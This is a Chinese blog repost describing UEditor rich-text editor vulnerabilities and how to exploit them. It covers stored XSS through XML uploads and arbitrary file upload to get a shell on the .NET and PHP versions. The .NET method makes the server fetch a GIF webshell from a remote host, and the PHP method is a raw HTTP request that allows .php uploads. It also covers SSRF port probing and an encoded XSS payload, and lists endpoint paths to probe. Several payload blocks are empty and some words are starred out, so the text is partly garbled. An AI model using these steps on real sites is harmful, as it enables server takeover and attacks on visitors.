html标签%3cp%3e,大神论坛 UEditor 富文本web编辑器最新漏洞 XML文件上传导致存储型XSS...

最新推荐文章于 2024-04-12 14:45:00 发布
最新推荐文章于 2024-04-12 14:45:00 发布
阅读量1.2k 收藏
点赞数
文章标签: html标签%3cp%3e

大神论坛 UEditor 富文本web编辑器最新漏洞 XML文件上传导致存储型XSS

原创

159768610802021-06-19 15:42:59©著作权

©著作权归作者所有:来自51CTO博客作者15976861080的原创作品,如需转载,请注明出处,否则将追究法律责任

https://blog.51cto.com/u_11440330/2927412

## **一、Ueditor最新版XML文件上传导致存储型XSS**

### 测试版本:php版 v1.4.3.3

### 下载地址:https://github.com/fex-team/ueditor 复现步骤:

### 1\. 上传一个图片文件

![1.png](https://s2.51cto.com/images/20210619/1624088283473552.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

### 2\. 然后buprsuit抓包拦截

![2.png](https://s2.51cto.com/images/20210619/1624088290217022.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

### 3.将uploadimage类型改为uploadfile,并修改文件后缀名为xml,最后复制上xml代码即可

![3.png](https://s2.51cto.com/images/20210619/1624088300983842.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

### 4\. 即可弹出xss

![4.png](https://s2.51cto.com/images/20210619/1624088307656281.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

### 请注意http://controller.xxx的访问路径

http://192.168.10.1/ueditor1433/php/controller.php?action=listfile

![5.png](https://s2.51cto.com/images/20210619/1624088318722850.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

### 常见的xml弹窗POC:

弹窗xss:

```

```

### URL跳转:

```

```

### 远程加载Js:

```

```

### 常用的上传路径:

```

/ueditor/index.html

/ueditor/asp/controller.asp?action=uploadimage

/ueditor/asp/controller.asp?action=uploadfile

/ueditor/net/controller.ashx?action=uploadimage

/ueditor/net/controller.ashx?action=uploadfile

/ueditor/php/controller.php?action=uploadfile

/ueditor/php/controller.php?action=uploadimage

/ueditor/jsp/controller.jsp?action=uploadfile

/ueditor/jsp/controller.jsp?action=uploadimage

```

### 常用列出获取路径:

```

/ueditor/net/controller.ashx?action=listfile

/ueditor/net/controller.ashx?action=listimage

```

## **二、文件上传漏洞**

### **1\. NET版本文件上传**

### 该任意文件上传漏洞存在于1.4.3.3、1.5.0和1.3.6版本中,并且只有**.NET**版本受该漏洞影响。***可以利用该漏洞上传***文件,执行命令控制服务器。

![6.png](https://s2.51cto.com/images/20210619/1624088332395499.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

### ueditor中已经下架.net版本,但历史版本中可以下载1.4.3版本,但是否是1.4.3.3目前还没验证。

![7.png](https://s2.51cto.com/images/20210619/1624088339483113.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

### 该漏洞是由于上传文件时,使用的CrawlerHandler类未对文件类型进行检验,导致了任意文件上传。1.4.3.3和1.5.0版本利用方式稍有不同,1.4.3.3需要一个能正确解析的域名。而1.5.0用IP和普通域名都可以。相对来说1.5.0版本更加容易触发此漏洞;而在1.4.3.3版本中***者需要提供一个正常的域名地址就可以绕过判断;

## **(1)ueditor . http://1.5.0.net 版本**

### 首先1.5.0版本进行测试,需要先在别的服务器上传一个图片***,比如:1.jpg/1.gif/1.png 都可以,下面x.x.x.x是别的服务器地址,source[]参数值改为图片***地址,并在结尾加上“?.aspx”即可getshell,利用POC:

```

POST /ueditor/net/controller.ashx?action=catchimage

source%5B%5D=http%3A%2F%2Fx.x.x.x/1.gif?.aspx

```

![8.png](https://s2.51cto.com/images/20210619/1624088365154169.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

(2) **ueditor.1.4.3.3** **.net版**

### 1\. 本地构造一个html,因为不是上传漏洞所以enctype 不需要指定为multipart/form-data, 之前见到有poc指定了这个值。完整的poc如下”

```

shell addr:

```

![9.png](https://s2.51cto.com/images/20210619/1624088372898160.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

### 2\. 需准备一个图片马儿,远程shell地址需要指定扩展名为 1.gif?.aspx 1.gif图片***(一句话***:密码:hello)如下:

GIF89a

```

```

### 其中 UmVxdWVzdC5JdGVtWyJoZWxsbyJd的base64值为:Request.Item["hello"]

![10.png](https://s2.51cto.com/images/20210619/1624088381987546.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

### 成功后,会返回马儿地址。

(3) **ueditor.1.3.6** **.net1版本**

### 使用%00截断的方式上传绕过

![11.png](https://s2.51cto.com/images/20210619/1624088388214944.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

![12.png](https://s2.51cto.com/images/20210619/1624088395704310.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

![13.jpg](https://s2.51cto.com/images/20210619/1624088402191210.jpg?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

![14.png](https://s2.51cto.com/images/20210619/1624088409216959.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

![15.png](https://s2.51cto.com/images/20210619/1624088416676849.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

### 三、PHP版本的文件上传

### 利用poc:

```

POST http://localhost/ueditor/php/action_upload.php? action=uploadimage&CONFIG[imagePathFormat]=ueditor/php/upload/fuck&CONFIG[i mageMaxSize]=9999999&CONFIG[imageAllowFiles] []=.php&CONFIG[imageFieldName]=fuck HTTP/1.1

Host: localhost Connection: keep-alive Content-Length: 222 Cache-Control: max-age=0 Origin: null

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36

Content-Type:multipart/form-data;boundary=—— WebKitFormBoundaryDMmqvK6b3ncX4xxA

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4

———WebKitFormBoundaryDMmqvK6b3ncX4xxA

Content-Disposition: form-data; name="fuck"; filename="fuck.php" Content-Type: application/octet-stream

———WebKitFormBoundaryDMmqvK6b3ncX4xxA—

```

### shell路径由CONFIG[imagePathFormat]=ueditor/php/upload/fuck决定[http://localhost/ueditor/php/upload/fuck.php

### **四、***F漏洞**

### 该漏洞存在于1.4.3的jsp版本中。但1.4.3.1版本已经修复了该漏洞。

![16.png](https://s2.51cto.com/images/20210619/1624088430928759.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

### ***F

已知该版本ueditor的***f触发点:

```

/jsp/controller.jsp?action=catchimage&source[]=

/jsp/getRemoteImage.jsp?upfile=

/php/controller.php?action=catchimage&source[]=

```

### 使 用 百 度 logo 构 造 poc:

```

这里可以根据页面返回的结果不同,来判断该地址对应的主机端口是否开放。可以总结为以下几点:

如 果 抓 取 不 存 在 的 图 片 地 址 时 , 页 面 返 回 {“state”: “SUCCESS”, list: [{“state”:"\u8fdc\u7a0b\u8fde\u63a5\u51fa\u9519"} ]},即state为“远程连接出错”。

如 果 成 功 抓 取 到 图 片 , 页 面 返 回 {“state”: “SUCCESS”, list: [{“state”: “SUCCESS”,“size”:“5103”,“source”:“http://192.168.135.133:8080/tomcat.png”,“title”: “1527173588127099881.png”,

“url”:"/ueditor/jsp/upload/image/20180524/1527173588127099881.png"}

]},即state为“SUCCESS”。

如 果 主 机 无 法 访 问 , 页 面 返 回 {“state”:“SUCCESS”, list: [{“state”: “\u6293\u53d6\u8fdc\u7a0b\u56fe\u7247\u5931\u8d25”}]}, 即state为“ 抓取远程图片失败”。

还有一个版本的***f漏洞 ,存在于onethink 1.0中的ueditor,测试版本为1.2直接贴Poc

POST http://target/Public/static/ueditor/php/getRemoteImage.php HTTP/1.1

Host: target

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded Content-Length: 37

Connection: keep-alive

upfile=https://www.google.com/?%23.jpg

```

## **五、另一处XSS漏洞**

### 首先安装部署环境:https://github.com/fex-team/ueditor/releases/tag/v1.4.3.3

存储型XSS需要写入后端数据库,这里要把编辑器部署到一个可与数据库交互的环境中。

首先我们打开编辑器输入正常的文本:

![17.png](https://s2.51cto.com/images/20210619/1624088443324362.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

### 抓包并将

标签以及原本的文本删除:

![18.png](https://s2.51cto.com/images/20210619/1624088453839570.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

插入payload:

```

%3Cp%3E1111111">

1%3Cbr%2F%3E%3C%2Fp%3E

```

![19.png](https://s2.51cto.com/images/20210619/1624088463654971.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

成功触发存储型XSS漏洞

![20.png](https://s2.51cto.com/images/20210619/1624088472455307.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

更多逆向漏洞学习交流文章,请访问 [大神论坛www.dslt.tech](https://www.dslt.tech/)

收藏

评论

闲鹤淡水
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
UEditor上传导致 XSS漏洞自动化实现POC_基于POCsuite3
afei001
07-16 601
UEditor上传导致 XSS漏洞自动化实现POC_基于POCsuite3
挖洞经验|UEditor编辑器存储XSS漏洞
MachineGunJoe666
05-29 3100
前言 UEditor是由百度web前端研发部开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点。UEditor存在一个XSS漏洞编辑器在定义过滤规则的时候不严和读取内容的时候的绕过导致了该漏洞,此漏洞已经上报,由于技术略菜,有分析不到位的还请多多见谅。 漏洞成因分析 漏洞文件产生在前端配置文件ueditor.config.js: 以下为纯文本粘贴为true时的过滤规则,对一些危险的标签没有做过滤,怪不得好多二次开发的。 //纯文本粘贴模式下的过滤规则 //'filterT
大神论坛 UEditor 富文本web编辑器最新漏洞XML文件上传导致存储XSS
xiaotuge_always的博客
06-19 1655
一、Ueditor最新XML文件上传导致存储XSS 测试版本:php版 v1.4.3.3 下载地址:https://github.com/fex-team/ueditor 复现步骤: 1. 上传一个图片文件 2. 然后buprsuit抓包拦截 3.将uploadimage类改为uploadfile,并修改文件后缀名为xml,最后复制上xml代码即可 4. 即可弹出xss 请注意http://controller.xxx的访问路径 http://192.168.10.1/ueditor1433/
实战纪实 | 编辑器漏洞Ueditor-任意文件上传漏洞 (老洞新谈)
最新发布
zkaqlaoniao的博客
04-12 4278
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
Ueditor1.3.6 setContent的一个bug
dechen6073的博客
07-04 110
Baidu Uedtior这个版本的占位标签为script标签,UE.get("editor")操作初始化编辑器,这个初始化动作似乎是个异步动作,在这个语句之后如果setContent就会报错: Uncaught TypeError: Cannot read property 'innerHTML' of undefined 可以用setTimeou...
百度html编辑器 xss,百度ueditor编辑器-xss漏洞
weixin_33871933的博客
06-25 1064
百度ueditor编辑器 xss漏洞一、漏洞简介产品官网下载地址:涉及版本:php , asp, jsp, net二、漏洞影响三、复现过程漏洞分析存在漏洞的文件:/php/getContent.php/asp/getContent.asp/jsp/getContent.jsp/net/getContent.ashx/php/getContent.php入进行了过滤,但是在14行输出时却使用了htm...
UeditorXML文件上传导致存储XSS(可以再试试xxe)和ssrf漏洞
weixin_50464560的博客
05-16 7219
UEditor 富文本web编辑器最新漏洞XML文件上传导致存储XSS - 『原创发布区』 - 大神论坛 |脱壳破解|易语言|病毒分析|www.dslt.tech 一、Ueditor最新XML文件上传导致存储XSS 测试版本:php版v1.4.3.3 下载地址:https://github.com/fex-team/ueditor复现步骤: 1.上传一个图片文件 2.然后buprsuit抓包拦截 3.将uploadimage类改为uploadfile,并修改文件后...
aima-java-AIMA3e.zip_AIMA_WWW。aiMa3。COM_www.aima 3.com_www.aima3
09-21
Artificial Inteligence in Java
EOCR-3E420施耐德韩国三和智能电动机保护器选操作说明书.pdf
10-26
EOCR-3E420施耐德韩国三和智能电动机保护器,EOCR-3E420自带模拟量输出功能电动机保护器采用3CT电流互感器实测主回路电流值,可对负载的过电流、缺相、堵转、反转和电流不平衡等故障进行检测和保护。
前端顽疾--XSS漏洞分析与解决.ppt
05-07
前端顽疾--XSS 漏洞分析与解决 一、前端顽疾--XSS 漏洞分析 XSS 漏洞是一种常见的前端安全问题,指的是攻击者在 Web 应用程序中注入恶意脚本,以欺骗用户或窃取用户信息。XSS 漏洞的危害非常高,黑客可以通过 XSS ...
HCFA禾川SV-RX3E系列伺服驱动器使用说明书V1.1.rar
07-04
HCFA禾川SV-RX3E系列伺服驱动器使用说明书
uEditor1.3.6补丁
04-25
修复在chrome 34.0.1847.116版本domUtils里removeAttributeNode报错问题 #149
Sparten3E的EDK实验.7z
01-20
Sparten3E的EDK实验.7z
UEditor上传导致 XSS漏洞复现
afei001
07-16 2487
UEditor是由百度「FEX前端研发团队」开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。UEditorv1.4.3.3中存在跨站脚本(XSS漏洞。...
ueditor php 漏洞_ueditor 1.3.6和1.4.3版本文件上传漏洞复现
热门推荐
weixin_39830323的博客
12-01 1万+
最近遇到了两个版本的ueditor文件上传漏洞,因此记录一下。ueditor 1.3.6这个版本下的漏洞,是位于本地图片上传这个位置。使用谷歌浏览器复现的时候,要注意一个细节所以可以使用低版本的谷歌浏览器继续复现,也可以使用IE复现。通过网站技术分析插件Wappalyzer可知网站建站语言是php随便输入一个目录,根据报错可知网站中间件为apache另外,使用module模式与php结合...
富文本输出如何避免XSS
jimmyleeee的专栏
05-12 2841
有时网站为了美观,会允许用户输入一些富文本,这样在显示的时候,就可以显示的更友好。虽然在输入富文本的时候在客户端进行了控制,但是,仍然难易避免一些攻击者通过抓包篡改数据绕过客户端的控制。因此,在服务器端收到富文本的数据之后,还是要进行净化处理。
js 前端防xss攻击——百度UEditor解决方案
两只橙的博客
11-02 9596
xss跨站脚本攻击(Cross Site Scripting),是一种经常出现在web应用中的计算机安全漏洞,指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。比如获取用户的Cookie,导航到恶意网站,携带木马等。  大部分的xss漏洞都是由于没有处理好用户的输入,导致攻击脚本在浏览器中执行,这就是跨站脚本漏洞的根
<title>Layer 1</title>需要怎么转换才能成为%3Ctitle%3ELayer 1%3C/title%3E的文件
05-19
这是一个 HTML 文件的一部分,需要进行 URL 编码才能成为 %3Ctitle%3ELayer%201%3C/title%3E 的形式。可以使用任何在线 URL 编码工具或者在 Python 中使用 urllib 库中的 quote 函数进行编码。例如,在 Python 中可以这样使用: ``` import urllib.parse original_string = '<title>Layer 1</title>' encoded_string = urllib.parse.quote(original_string) print(encoded_string) ``` 输出结果为: ``` %3Ctitle%3ELayer%201%3C%2Ftitle%3E ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值